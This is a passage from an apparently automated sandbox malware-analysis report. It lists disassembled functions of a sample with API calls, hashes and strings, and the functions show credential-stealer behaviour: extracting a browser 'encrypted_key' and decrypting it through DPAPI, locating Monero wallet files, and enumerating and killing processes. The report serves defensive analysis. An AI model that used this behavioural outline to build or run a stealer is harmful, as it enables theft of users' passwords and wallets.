                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        • Opcode ID: 9be1608884b396171fac14043a10f9944cbc73d348b0a4a4ad5463478baf58bb
                                        • Instruction ID: f2de12b00545fcdfa0418bcbfbc608772798885caf4eb779071c18a33e21d4b6
                                        • Opcode Fuzzy Hash: 9be1608884b396171fac14043a10f9944cbc73d348b0a4a4ad5463478baf58bb
                                        • Instruction Fuzzy Hash: F9513C71A10208EFDB18EFA8CD96FED7776BF94344F008118F90A5B691EB746A05CB52
                                        Function 0097F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00991678,00990D93), ref: 0097F64C
                                        • lstrlen.KERNEL32(00000000), ref: 0097F66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: 2ecd6920920da47d110e8f744f996d0cc661ade03af20d16328b50753503e0d8
                                        • Instruction ID: d0fe8e29587e4da577c3e31a794e90845465e52c6514c537a73a3a81aab6377d
                                        • Opcode Fuzzy Hash: 2ecd6920920da47d110e8f744f996d0cc661ade03af20d16328b50753503e0d8
                                        • Instruction Fuzzy Hash: C551DF72D101089BDB08FBA4DDA6EED737DBFD4300F408569F51667291EE386A09CB62
                                        Function 009837B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 69195d1a451a99dedb7a4dbff5f93d9de9713bfa58386174101f84f97b238013
                                        • Instruction ID: 4a63ee9c435bcbac2632be97efaeb7cc26bd06a71f1f7a72a3fc11d9faf5d002
                                        • Opcode Fuzzy Hash: 69195d1a451a99dedb7a4dbff5f93d9de9713bfa58386174101f84f97b238013
                                        • Instruction Fuzzy Hash: 76413A71D00109DBDF04FFA4D895BEEB779AF98704F008419F416B6290EB78AA04CBA2
                                        Function 0097A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0097A489
                                          • Part of subcall function 0097A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A23F
                                          • Part of subcall function 0097A210: LocalAlloc.KERNEL32(00000040,?,?,?,00974F3E,00000000,?), ref: 0097A251
                                          • Part of subcall function 0097A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A27A
                                          • Part of subcall function 0097A210: LocalFree.KERNEL32(?,?,?,?,00974F3E,00000000,?), ref: 0097A28F
                                          • Part of subcall function 0097A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0097A2D4
                                          • Part of subcall function 0097A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0097A2F3
                                          • Part of subcall function 0097A2B0: LocalFree.KERNEL32(?), ref: 0097A323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: d6bf5fa3e9510292359e871ca1dcdac75771786b61b0427b880971e9419fe52d
                                        • Instruction ID: 6ce49e556fe06f7a8937b4bf7c17636b62df34a486b4bc9fc5b16645e5264c3e
                                        • Opcode Fuzzy Hash: d6bf5fa3e9510292359e871ca1dcdac75771786b61b0427b880971e9419fe52d
                                        • Instruction Fuzzy Hash: 68311EB6D00109ABDF04DB94DD46AEFB7B9BBD8304F448518F905A7241E7359A04CBA2
                                        Function 00989660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0098967B
                                          • Part of subcall function 00988EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009896AE,00000000), ref: 00988EEB
                                          • Part of subcall function 00988EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00988EF2
                                          • Part of subcall function 00988EE0: wsprintfW.USER32 ref: 00988F08
                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0098973B
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00989759
                                        • CloseHandle.KERNEL32(00000000), ref: 00989766
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                        • String ID:
                                        • API String ID: 3729781310-0
                                        • Opcode ID: 809f841d892931a9b82ff7bacd0772f405dfc1b1b046e4d8e20533dbdce2786d
                                        • Instruction ID: c17c8d32ad18588a14e68f59ec224d7b206459deff1023f5a9b938d77a928cc3
                                        • Opcode Fuzzy Hash: 809f841d892931a9b82ff7bacd0772f405dfc1b1b046e4d8e20533dbdce2786d
                                        • Instruction Fuzzy Hash: 41310875E11248EBDF14EFE0CD49BEDB7B8BB44700F104559F606AB284EB78AA48CB51
                                        Function 00988810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009905BF), ref: 0098885A
                                        • Process32First.KERNEL32(?,00000128), ref: 0098886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 00988883
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • CloseHandle.KERNEL32(?), ref: 009888F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 9da87a87df1f343d1a9a7f25cd21baa537a3120443d2085b45bf0b35abf33ba3
                                        • Instruction ID: cc415988083c17a154b617a02065e1e4c48f81970e54ab4e4685d3c71cf65f98
                                        • Opcode Fuzzy Hash: 9da87a87df1f343d1a9a7f25cd21baa537a3120443d2085b45bf0b35abf33ba3
                                        • Instruction Fuzzy Hash: 66314D71901118EBDB24EF94CD51FEEB778FF85700F50469AF10AA22A0DB386A44CFA1
                                        Function 009EFDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009EFE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009EFE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 6319bda5ffcb1849669521969156150f8f00c564407d018c83c36a21fafd6d10
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: 6E01243220A7A5EEF6362B765CD9A773688EB413B0734433FF216801F2EF515C419280
                                        Function 00987B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00990DE8,00000000,?), ref: 00987B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00990DE8,00000000,?), ref: 00987B54
                                        • wsprintfA.USER32 ref: 00987B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 41181919c3568cb0be141535dedbd49e18a8184d500642cf8d7cd5016d03f191
                                        • Instruction ID: 53ede5a69e1bebe86b5a996d67dc924f75988b88daeb37b570165b2101f0b856
                                        • Opcode Fuzzy Hash: 41181919c3568cb0be141535dedbd49e18a8184d500642cf8d7cd5016d03f191
                                        • Instruction Fuzzy Hash: 7C1127B2909218ABCB14DBC9DD45FBEB7B8FB4DB11F10421AF605A2280E3795940C7B0
                                        Function 00989470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00983D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00983D3E,?), ref: 0098948C
                                        • GetFileSizeEx.KERNEL32(000000FF,00983D3E), ref: 009894A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 009894B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: a957f2e0ec7bb86463f53128b7daeda45cfbba45f9381df270f61ce739ce5f54
                                        • Instruction ID: 1efa2fcb36cacc196ac24b5e4a1f3f061f1ec440d503656aa2e1a60c7dcf10c6
                                        • Opcode Fuzzy Hash: a957f2e0ec7bb86463f53128b7daeda45cfbba45f9381df270f61ce739ce5f54
                                        • Instruction Fuzzy Hash: E8F04F39E04208BBEB10EFB0EC49FAE77B9BB48710F10C654FA15A7290D77496019B80
                                        Function 0098CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 0098CA7E
                                          • Part of subcall function 0098C2A0: __amsg_exit.LIBCMT ref: 0098C2B0
                                        • __getptd.LIBCMT ref: 0098CA95
                                        • __amsg_exit.LIBCMT ref: 0098CAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0098CAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
